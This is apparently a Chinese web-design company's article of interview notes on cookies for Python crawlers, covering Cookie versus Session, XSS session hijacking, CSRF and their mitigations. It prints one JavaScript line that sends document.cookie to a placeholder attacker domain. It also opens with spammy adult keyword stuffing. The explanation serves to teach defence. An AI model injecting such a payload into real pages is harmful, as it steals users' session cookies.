真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

python爬蟲Cookie的面試題示例

小編給大家分享一下python爬蟲Cookie的面試題示例,希望大家閱讀完這篇文章后大所收獲,下面讓我們一起去探討吧!

洪雅網(wǎng)站建設(shè)公司成都創(chuàng)新互聯(lián)公司,洪雅網(wǎng)站設(shè)計(jì)制作,有大型網(wǎng)站制作公司豐富經(jīng)驗(yàn)。已為洪雅近1000家提供企業(yè)網(wǎng)站建設(shè)服務(wù)。企業(yè)網(wǎng)站搭建\成都外貿(mào)網(wǎng)站建設(shè)公司要多少錢,請(qǐng)找那個(gè)售后服務(wù)好的洪雅做網(wǎng)站的公司定做!

1.Cookie和Session關(guān)系

都是為了實(shí)現(xiàn)客戶端與服務(wù)端交互而產(chǎn)出

Cookie是保存在客戶端,缺點(diǎn)易偽造、不安全

Session是保存在服務(wù)端,會(huì)消耗服務(wù)器資源

Session實(shí)現(xiàn)有兩種方式:Cookie和URL重寫

2.Cookie帶來(lái)的安全性問(wèn)題

會(huì)話劫持和XSS:在Web應(yīng)用中,Cookie常用來(lái)標(biāo)記用戶或授權(quán)會(huì)話。因此,如果Web應(yīng)用的Cookie被竊取,可能導(dǎo)致授權(quán)用戶的會(huì)話受到攻擊。常用的竊取Cookie的方法有利用社會(huì)工程學(xué)攻擊和利用應(yīng)用程序漏洞進(jìn)行XSS攻擊。(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;HttpOnly類型的Cookie由于阻止了JavaScript對(duì)其的訪問(wèn)性而能在一定程度上緩解此類攻擊。

跨站請(qǐng)求偽造(CSRF):維基百科已經(jīng)給了一個(gè)比較好的CSRF例子。比如在不安全聊天室或論壇上的一張圖片,它實(shí)際上是一個(gè)給你銀行服務(wù)器發(fā)送提現(xiàn)的請(qǐng)求:當(dāng)你打開含有了這張圖片的HTML頁(yè)面時(shí),如果你之前已經(jīng)登錄了你的銀行帳號(hào)并且Cookie仍然有效(還沒(méi)有其它驗(yàn)證步驟),你銀行里的錢很可能會(huì)被自動(dòng)轉(zhuǎn)走。

解決CSRF的辦法有:隱藏域驗(yàn)證碼、確認(rèn)機(jī)制、較短的Cookie生命周期等

看完了這篇文章,相信你對(duì)python爬蟲Cookie的面試題示例有了一定的了解,想了解更多相關(guān)知識(shí),歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝各位的閱讀!


本文名稱:python爬蟲Cookie的面試題示例
本文鏈接:http://weahome.cn/article/gieeis.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部